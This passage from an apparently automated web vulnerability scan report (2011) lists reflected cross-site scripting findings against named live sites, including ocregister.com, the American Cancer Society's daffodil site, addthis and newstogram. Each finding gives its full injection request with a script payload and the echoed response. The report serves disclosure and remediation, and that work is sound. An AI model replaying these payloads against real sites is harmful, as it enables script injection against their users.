Expires: Fri, 04 Feb 2011 18:54:46 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:45 GMT
Connection: keep-alive
Content-Length: 277034

/* http://common.cdn.onset.freedom.com/tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_nav&scode=ocregister&e7e46*/alert(1)//5ca6254cbb1=1 */
/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 200
...[SNIP]...

1.107. http://common.onset.freedom.com/tools/load.php [scode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /tools/load.php

Issue detail

The value of the scode request parameter is copied into the CSS block comment at the top of a stylesheet response (Content-Type: text/css), not into an HTML document. The payload 3df07<script>alert(1)</script>35144f36647 was submitted in the scode parameter and was echoed unmodified. Within a stylesheet the tag is inert and would execute only if the response were interpreted as HTML; the same scode value is reflected into a JavaScript response in 1.108, where a comment break-out does execute.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister3df07<script>alert(1)</script>35144f36647 HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:37 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n3), ms iad-agg-n3 ( sfo-agg-n14), ms sfo-agg-n14 ( origin)
ETag: "2ca22c76c464a94c8b23b21959b5333c-22441"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:37 GMT
Age: 0
Content-Type: text/css
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:37 GMT
Connection: keep-alive
Content-Length: 22441

/* http://common.cdn.onset.freedom.com/tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister3df07<script>alert(1)</script>35144f36647 */
/*generic freedom site styles, take layout.css styles and define fonts, background images, etc */

/* define page areas */
body {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 100%;
...[SNIP]...

1.108. http://common.onset.freedom.com/tools/load.php [scode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /tools/load.php

Issue detail

The value of the scode request parameter is copied into the JavaScript block comment at the top of the bundle. The payload 4af35*/alert(1)//4781d05c682 was submitted in the scode parameter and was echoed unmodified; the */ ends the comment and alert(1) is parsed as code. The response is text/javascript, so the code executes in the origin of a page that includes this URL as a script, not on direct navigation.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_nav&scode=ocregister4af35*/alert(1)//4781d05c682 HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:31 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n18), ms iad-agg-n18 ( sfo-agg-n52), ms sfo-agg-n52 ( origin)
ETag: "c2f050b674a3c750a989f83312ba3a06-4132"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:31 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:31 GMT
Connection: keep-alive
Content-Length: 4132

/* http://common.cdn.onset.freedom.com/tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_nav&scode=ocregister4af35*/alert(1)//4781d05c682 */
/*
* jQuery ifixpng plugin
* (previously known as pngfix)
* Version 2.1 (23/04/2008)
* @requires jQuery v1.1.3 or above
*
* Examples at: http://jquery.khurshid.com
* Copyright (c) 20
...[SNIP]...

1.109. http://da.newstogram.com/hg.php [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://da.newstogram.com
Path:   /hg.php

Issue detail

The value of the callback request parameter is used verbatim as the JSONP callback name that prefixes the JSON body; the response is Content-Type: application/json, not an HTML document. The payload fc1bd<script>alert(1)</script>f099d0b47bf was submitted in the callback parameter and was echoed unmodified as the first bytes of the response body. Whether a browser renders that body as HTML depends on content-type sniffing, but the defect is independent of that: an unvalidated callback lets the requester choose the code that precedes the JSON, so the name should be restricted to identifier characters and the response served with X-Content-Type-Options: nosniff.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hg.php?uid=B46354F1-787D-4611-AE0D-C5EFA6EF634B&k=e58aac080a2606121e77aba437a3165d&s=http%3A//mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E1f35e8c0ea2/&r=http%3A//burp/show/49&q=0&e=2&cid=&callback=Newstogram.completedfc1bd<script>alert(1)</script>f099d0b47bf HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1105555422-1296072885434; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%27

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 03 Feb 2011 18:54:26 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%27; expires=Fri, 03-Feb-2012 18:54:26 GMT; domain=.newstogram.com
Content-Length: 164

Newstogram.completedfc1bd<script>alert(1)</script>f099d0b47bf({"Histogram":{"status":"error","uid":"76DB7C80-A3AF-45F2-82C2-8381798839F3'","ip":"173.193.214.243"}})

1.110. http://da.newstogram.com/hg.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://da.newstogram.com
Path:   /hg.php

Issue detail

The scanner labels this insertion point as the name of an arbitrarily supplied request parameter, but the request below shows the payload 1a69a<script>alert(1)</script>840e96d1dd4 placed inside the callback value, after a / inserted into Newstogram.completed. It is therefore the same unvalidated JSONP callback as 1.109: the value is echoed unmodified at the start of an application/json response, and the / that survived shows the name is not even restricted to identifier characters.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hg.php?uid=B46354F1-787D-4611-AE0D-C5EFA6EF634B&k=e58aac080a2606121e77aba437a3165d&s=http%3A//mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E1f35e8c0ea2/&r=http%3A//burp/show/49&q=0&e=2&cid=&callback=Newstogram.compl/1a69a<script>alert(1)</script>840e96d1dd4eted HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1105555422-1296072885434; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%27

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 03 Feb 2011 18:54:28 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%27; expires=Fri, 03-Feb-2012 18:54:28 GMT; domain=.newstogram.com
Content-Length: 165

Newstogram.compl/1a69a<script>alert(1)</script>840e96d1dd4eted({"Histogram":{"status":"error","uid":"76DB7C80-A3AF-45F2-82C2-8381798839F3'","ip":"173.193.214.243"}})

1.111. http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://daffodil.acsevents.org
Path:   /site/TR/DaffodilDays/DDFY10Pennsylvania

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b337"><script>alert(1)</script>ef6b6cded06 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/TR/DaffodilDays6b337"><script>alert(1)</script>ef6b6cded06/DDFY10Pennsylvania?pg=entry&fr_id=26972 HTTP/1.1
Host: daffodil.acsevents.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:04:48 GMT
Server: Apache
Cache-Control: private
Set-Cookie: JServSessionIdr004=cf8yj71601.app324b; domain=.acsevents.org; path=/
Keep-Alive: timeout=8, max=462
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 31955

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>


<base href="http://daffodil.acsevents.org/site/" />


<title>The American Cancer Society: </title>
<meta http-equiv="Co
...[SNIP]...
<form name="TrEventSearchForm" id="TrEventSearchForm" action="http://daffodil.acsevents.org/site/TR/DaffodilDays6b337"><script>alert(1)</script>ef6b6cded06/DDFY10Pennsylvania?pg=entry&fr_id=26972" method="post">
...[SNIP]...

1.112. http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://daffodil.acsevents.org
Path:   /site/TR/DaffodilDays/DDFY10Pennsylvania

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20b20"><script>alert(1)</script>f315c83fe6a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/TR/DaffodilDays/DDFY10Pennsylvania20b20"><script>alert(1)</script>f315c83fe6a?pg=entry&fr_id=26972 HTTP/1.1
Host: daffodil.acsevents.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:04:49 GMT
Server: Apache
Cache-Control: private
Set-Cookie: JServSessionIdr004=ca1fem1602.app312b; domain=.acsevents.org; path=/
Keep-Alive: timeout=8, max=489
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 31955

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>


<base href="http://daffodil.acsevents.org/site/" />


<title>The American Cancer Society: </title>
<meta http-equiv="Co
...[SNIP]...
<form name="TrEventSearchForm" id="TrEventSearchForm" action="http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania20b20"><script>alert(1)</script>f315c83fe6a?pg=entry&fr_id=26972" method="post">
...[SNIP]...

1.113. http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://daffodil.acsevents.org
Path:   /site/TR/DaffodilDays/DDFY10Pennsylvania

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab6ab"><script>alert(1)</script>a53cb358e62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/TR/DaffodilDays/DDFY10Pennsylvania?pg=entry&fr_id=26972&ab6ab"><script>alert(1)</script>a53cb358e62=1 HTTP/1.1
Host: daffodil.acsevents.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:04:47 GMT
Server: Apache
Cache-Control: private
Set-Cookie: JServSessionIdr004=jgb0xc15z1.app314b; domain=.acsevents.org; path=/
Keep-Alive: timeout=8, max=461
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 31972

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>


<base href="http://daffodil.acsevents.org/site/" />


<title>The American Cancer Society: </title>
<meta http-equiv="Co
...[SNIP]...
<form name="TrEventSearchForm" id="TrEventSearchForm" action="http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania?pg=entry&fr_id=26972&ab6ab"><script>alert(1)</script>a53cb358e62=1" method="post">
...[SNIP]...

1.114. http://ds.addthis.com/red/psi/sites/mapserver.superpages.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/mapserver.superpages.com/p.json

Issue detail

The value of the callback request parameter is used verbatim as the JSONP callback name in a text/javascript response, not in an HTML document. The payload 59e02<script>alert(1)</script>41e145e4da2 was submitted in the callback parameter and was echoed unmodified as the first bytes of the response body. The legitimate value is the dotted identifier _ate.ad.hpr; anything outside identifier characters should be rejected rather than echoed.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/mapserver.superpages.com/p.json?callback=_ate.ad.hpr59e02<script>alert(1)</script>41e145e4da2&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fmapserver.superpages.com%2Fmapbasedsearch%2F%3F%26SRC%3Dcomlocal1a%26C%3Dbanks415ee%2522%253balert(1)%2F%2F7f39f412a8d%26L%3D19101%26CS%3DL%26MCBP%3Dtrue%26C%3DBanks%26STYPE%3DS%26PS%3D15%26search%3DFind%2BIt&ref=http%3A%2F%2Fburp%2Fshow%2F52&wzilxl HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh31.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296659685.60|1296659685.66; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 463
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 03 Feb 2011 18:54:36 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 05 Mar 2011 18:54:36 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296759276.60|1296659685.66; Domain=.addthis.com; Expires=Sat, 02-Feb-2013 14:10:54 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 03 Feb 2011 18:54:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 18:54:37 GMT
Connection: close

_ate.ad.hpr59e02<script>alert(1)</script>41e145e4da2({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fmapserver.superpages.com%2fmapbasedsearch%2f%3f%26SRC%3dcomlocal1a%26C%3
...[SNIP]...

1.115. http://easycheckingbanking.com/ [keyword parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://easycheckingbanking.com
Path:   /

Issue detail

The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6ebd"><script>alert(1)</script>7daaa4423aa was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?keyword=f6ebd"><script>alert(1)</script>7daaa4423aa HTTP/1.1
Host: easycheckingbanking.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:43:35 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=dae8755f44e9e7e1e70452e10de4ca1b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 697
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<frame src="http://onlinecheckingservices.com/?keyword=f6ebd"><script>alert(1)</script>7daaa4423aa" "frameborder=0"/>
...[SNIP]...

1.116. http://easycheckingbanking.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://easycheckingbanking.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2176b"><script>alert(1)</script>81ec6443090 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?keyword=online%20banking?adid=640302&2176b"><script>alert(1)</script>81ec6443090=1 HTTP/1.1
Host: easycheckingbanking.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:43:36 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=6ff48bba9adbd319bbc6900ffd56092c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 728
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<frame src="http://onlinecheckingservice.info/?keyword=online%20banking?adid=640302&2176b"><script>alert(1)</script>81ec6443090=1" "frameborder=0"/>
...[SNIP]...

1.117. http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://economy.ocregister.com
Path:   /2011/02/03/o-c-in-top-three-for-job-growth/48434/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks (the href of the RSS alternate link on the resulting 404 page). The payload f5d90"><script>alert(1)</script>0368ae71355 was submitted in the REST URL parameter 5 and was echoed as f5d90\"><script>alert(1)</script>0368ae71355. The application prefixes the double quote with a backslash, which would protect a JavaScript or SQL string literal but has no meaning inside an HTML attribute: the browser still ends the attribute at the quote and parses the script element that follows.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/o-c-in-top-three-for-job-growth/48434f5d90"><script>alert(1)</script>0368ae71355/ HTTP/1.1
Host: economy.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:05:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://economy.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:05:21 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Handling Hard Times - www.ocregister.com" href="http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434f5d90\"><script>alert(1)</script>0368ae71355/feed/" />
...[SNIP]...

1.118. http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://economy.ocregister.com
Path:   /2011/02/03/o-c-in-top-three-for-job-growth/48434/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks (the href of the RSS alternate link, built from the request URL). The payload 44f2c"><script>alert(1)</script>737289185c2 was submitted as a parameter name and was echoed as 44f2c\"><script>alert(1)</script>737289185c2. As in 1.117, the backslash added before the quote is a string-escaping convention that the HTML parser ignores, so the attribute is still terminated and the injected script element is parsed.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/o-c-in-top-three-for-job-growth/48434/?44f2c"><script>alert(1)</script>737289185c2=1 HTTP/1.1
Host: economy.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:05:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://economy.ocregister.com/xmlrpc.php
Link: <http://economy.ocregister.com/?p=48434>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64744


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
" type="application/rss+xml" title=" O.C. in top three for job growth - Handling Hard Times - www.ocregister.com" href="http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434/?44f2c\"><script>alert(1)</script>737289185c2=1feed/" />
...[SNIP]...

1.119. http://events.cbs6albany.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2aef0"><script>alert(1)</script>a10a5ec7939 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2aef0"><script>alert(1)</script>a10a5ec7939=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:04:52 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 65
ETag: "d45dd6fb38635da348595e70063c67d0"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: welcome=ZnQm83phUT7lm535Hcc9Hw.100548874; path=/; expires=Fri, 03-Feb-2012 19:04:52 GMT
Set-Cookie: zvents_tracker_sid=ZnQm83phUT7lm535Hcc9Hw.100548874; path=/; expires=Fri, 03-Feb-2012 19:04:52 GMT
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNGJjZjhlMDk1NjdlM2MxN2UyMWU3MGYzNGIyNjFkYjAiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--27664081a0eab3f3b2e0027627338ca81f9e5efe; path=/; expires=Tue, 03-May-2011 19:04:52 GMT; HttpOnly
Content-Length: 53016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?2aef0"><script>alert(1)</script>a10a5ec7939=1" />
...[SNIP]...

1.120. http://events.ocregister.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9e5a"><script>alert(1)</script>8d769312283 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f9e5a"><script>alert(1)</script>8d769312283=1 HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
